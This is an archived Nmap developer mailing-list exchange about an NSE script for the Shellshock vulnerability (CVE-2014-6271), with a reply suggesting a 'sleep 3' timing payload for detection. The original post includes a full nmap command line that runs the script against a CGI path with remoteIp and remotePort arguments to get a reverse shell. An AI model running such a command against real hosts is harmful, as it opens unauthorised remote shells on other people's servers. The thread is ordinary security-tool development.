Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Shell Shock NSE Script (CVE-2014-6271)

From: Dean Pierce <pierce403 () gmail com>
Date: Mon, 29 Sep 2014 13:07:27 -0700
I feel like having a payload of something like "sleep 3" would make
more sense than the various pingback methods.  Then if you just wait
to see if the request takes ~3 seconds rather than having to set up a
listener on some publicly exposed server.

  - DEAN

On Fri, Sep 26, 2014 at 1:45 AM, Paul Amar <paul () sensepost com> wrote:

Hi list,

I created a NSE script for the Shell Shock vulnerability (CVE-2014-6271).

I tested the script with Pentesterlab's VM located here:
files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso.

This script detects if the host is vulnerable.
If so, you get a reverse shell by specifying the good arguments.

Eg. ./nmap -p80 --script http-vuln-cve-2014-6271.nse --script-args
http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status
<ip> -d

Feel free if you have any feedback,
Paul

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: